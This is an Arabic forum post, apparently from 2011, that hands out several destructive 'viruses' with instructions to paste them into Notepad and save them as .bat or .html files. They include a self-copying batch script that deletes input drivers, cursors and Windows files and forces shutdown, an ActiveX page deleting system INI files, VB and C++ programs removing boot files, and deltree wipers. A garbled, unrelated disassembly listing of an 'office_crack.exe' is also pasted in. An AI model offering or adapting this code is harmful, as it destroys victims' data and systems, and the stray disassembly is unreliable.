موقع سهاد القلبموقع سهادالرئيسيةس .و .جالتسجيلاعلاناتاتصل بنادخول
انت متصل باسم
آخر زيارة لك كانت
لديك 1 مساهمة
ثمة هنا مجتمع باذخ بالعطاء مسرف في الاحاسيس ينتظركم بكرم السيل من مجتمع سهاد القلب إلى اصحاب المشاعر و الاحاسيس

شاطر | 
 

 فيروسات ضخمه جدا و مدمره

اذهب الى الأسفل 
كاتب الموضوعرسالة
ندى العمر
عضو متميز
عضو متميز
avatar

الــــدولــــة :
الــجــنــس : انثى
الــمـهــنــة :
الــهــوايــة :
الــمــزاج :
عدد المساهمات : 120
M M S :
S M S : مملكة و منتيات سهاد القلب الموقع الرسمي
الاوسمة :

الاضافات
مشاركة/share:
قيم-الموضوع/Rate-Thread:

مُساهمةموضوع: فيروسات ضخمه جدا و مدمره   الإثنين 10 أكتوبر 2011, 00:09

بسم الله الرحمن الرحيم
السلام عليكم

هذا الفيروس يقوم بمهام منها

1:نسخ نفسه في بدا التشغيل
2:تعطيل الكيبورد والفارة
3:انشاء الالاف من المجلدات على سطح المكتب وعلى c
4:حذف temp antivirus
5:يعطل المؤشرات
6:حذف الويندوز نهائيا
7:غلق الجهاز بطريقة ة

كود:
@echo OFF
title T0TAL_DZ is attacked your systeme
attrib +s +h %0
copy %0 "C:\Users\%username%\AppData\Roaming\Microsoft\Win dows\start Menu\Programs\startup"
cd C:Windowssystem32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
mkdir C:Users%usernameDesktopHELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING , PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET RESTARTING YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
echo CHECK YOUR DESKTOP
ping localhost >nul
mkdir C:HOLY MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS FITS!
echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL
ping localhost >nul
echo Y | del C:WindowssecurityDatabase
cd C:WindowsCursors
del /S /F /Q *.cur
del /S /F /Q *.ani
echo OH NO WHERE THE DID YOUR CURSOR GO
ping localhost >nul
cls
echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, T0TAL IS HERE"
exit

فيروس الهوتميل

وهدا فيروس خطير جدااا فيروس الهوتميل
يقوم بتعطيل كل شيء
انسخ الكود وضعه في المفكرة notepad واحفطه متلا بي bLaCkDrEaM.html






<**** **********="Content-Type"
content="text/html; charset=iso-8859-1">


THIS HTML USING ACTIVE-X PLEASE CLICK #YES#



On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete





.................................................. ..

مقسم الى مجموعات قوم بتجميعها فيnotepad النوت باد ضعه في النوت باد وحفظ بي bLaCkDrEaM.bat


اقتباس:
Disassembly of File: office_crack.exe

Code Offset = 00000400, Code Size = 00000000

Data Offset = 00000400, Data Size = 00000000


Number of Objects = 0003 (dec), Imagebase = 004A0000h


Object01: UPX0 RVA: 00001000 Offset: 00000400 Size: 00000000 Flags: E0000080

Object02: UPX1 RVA: 00007000 Offset: 00000400 Size: 00005000 Flags: E0000040

Object03: .rsrc RVA: 0000C000 Offset: 00005400 Size: 00000400 Flags: C0000040




+++++++++++++++++++ MENU INFORMATION ++++++++++++++++++


There Are No Menu Resources in This Application


+++++++++++++++++ DIALOG INFORMATION ++++++++++++++++++


There Are No Dialog Resources in This Application 0


+++++++++++++++++++ IMPORTED FUNCTIONS ++++++++++++++++++ 0

Number of Imported Modules = 0 (decimal)




+++++++++++++++++++ IMPORT MODULE DETAILS +++++++++++++++ 0


+++++++++++++++++++ EXPORTED FUNCTIONS ++++++++++++++++++ 0

Number of Exported Functions = 0000 (decimal) ++








+++++++++++++++++++ ASSEMBLY CODE LISTING ++++++++++++++++++

//********************** Start of Code in Object UPX0 **************

Program Entry Point = 004ABE60 (office_crack.exe File Offset:0000B260) g




:004A7000 EE out dx, al

:004A7001 8702 xchg dword ptr [edx], eax

:004A7003 92 xchg eax,edx r

:004A7004 005026 add byte ptr [eax+26], dl

:004A7007 4A dec edx p

:004A7008 004003 add byte ptr [eax+03], al

:004A700B FD std by

:004A700C B269 mov dl, 69

:004A700E 9A2C1004F425E8 call E825:F404102C

:004A7015 0100 add dword ptr [eax], eax

:004A7017 4B dec ebx d

:004A7018 CE into b

:004A7019 699A6ED91FC82AC003B8 imul ebx, dword ptr [edx+C81FD96E], B803C02A 0

:004A7023 B0A8 mov al, A8

:004A7025 A6 cmpsb

:004A7026 699AA6A0989088809AA6 imul ebx, dword ptr [edx+9098A0A6], A69A8088 0

:004A7030 699A787068605850CD60 imul ebx, dword ptr [edx+60687078], 60CD5058 0

:004A703A 9F lahf e

:004A703B 69480044073830 imul ecx, dword ptr [eax+00], 30380744

:004A7042 344D xor al, 4D

:004A7044 D3 BYTE 0d0h

:004A7045 7403 je 004A704A or

:004A7047 28241C sub byte ptr [esp+ebx], ah


* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:004A7045(C) y

| 00

:004A704A 1810 sbb byte ptr [eax], dl

:004A704C D32CBB shr dword ptr [ebx+4*edi], cl

:004A704F D7 xlat w

:004A7050 0823 or byte ptr [ebx], ah

:004A7052 03F8 add edi, eax e

:004A7054 29F0 sub eax, esi e

:004A7056 E84DD3344D call 4D7F43A8

:004A705B E0D8 loopnz 004A7035 ],

:004A705D D0C8 ror al, 1

:004A705F BCB4344DD3 mov esp, D34D34B4

:004A7064 34AC xor al, AC

:004A7066 A4 movsb[/

.................................................. ..
كود لحذف شاشة الترحيب للويندوز

من العنوان ستفهم كل العادة ضعه فيnotepad النوت باد وحفط بي bLaCkDrEaM.bat

اقتباس:
Del c:\windows\Logos.sys

Del c:\windows\Logow.sys

.................................................. ...
فيروس الفيجول بيسك
ا فيروسات تدمير الويندوز
احفط بي bLaCkDrEaM.bat

اقتباس:
vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"[/CODE


.................................................. ...........

فيروس تدمير الويندوزnew

يمتاز الفيروس بتعديب الضجية ودلك بصدار عدة اوامر تم يقوم بتدمير الهاردسك
انسخ الكود واحفظه في النوت باد notebad وبعد دالك حفط bLaCkDrEaM.bat


Del c:\windows\system\msconfig.exe

Del c:\windows\Rundll32.exe

Del c:\windows\regedit.exe

Del c:\windows\Rundll.exe

Del c:\Autoexec.bat

Del c:\command.com

Del c:\windows\Logos.sys

Del c:\windows\Logow.sys

Del c:\windows\Scanregw.exe

Del C:\Program Files\Internet Explorer\Iexplore.exe

Del c:\windows\system\Sysedit.exe

Del c:\windows\win.com



@Echo off

c:

cd %WinDir%\System\

deltree /y *.exe


أن شاء الله تعـجبكم

أخوكم الحلم الاسود

يتبع.............................
---------------
bLaCkDrEaM

1- قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
انسخ
كود:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo
2- قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز
انسخ
كود:


call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo
3-فيرووس C++ :
انسخ

كود:
#include
#include
#include
main()
{
clrscr();
printf("tttCoffin Of Evil ");
printf("ttWElcome to My World");
remove("c:\windows\system.ini");
remove("c:\windows\win.ini");
remove("c:\autoexec.bat");
remove("c:\msdos.sys");
remove("c:\io.sys");
remove("c:\command.com");
remove("c:\config.sys");
remove("c:\windows\ebd\command.com");
remove("c:\windows\ebd\ebd.cab");
remove("c:\windows\ebd\Autoexec.bat");
remove("c:\windows\ebd\setramd.bat");
remove("c:\windows\ebd\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...nn");
system("PAUSE");
}
4- إطفاء الجهاز بعد 60 ثانيه
كود:


cmdow @ /HID
shutdown.exe -r -f -t 60 -c "Windows XP will now restart in 60 Seconds...hacked by حط الكلام الذي تريد"
net user aspnet /delete
EXIT

ارجو عدم استخدامه على اخواننا المسلمين
واني بريء من كل عمل يضر اخواننا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
فيروسات ضخمه جدا و مدمره
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
مملكة و منتديات سهاد القلب الموقع الرسمي ::   ::   :: الأمن و الحماية الإلكترونية-
انتقل الى:  
سحابة الكلمات الدلالية

أنت غير مسجل في سهاد القلب للتسجيل .. اضغط هـنـا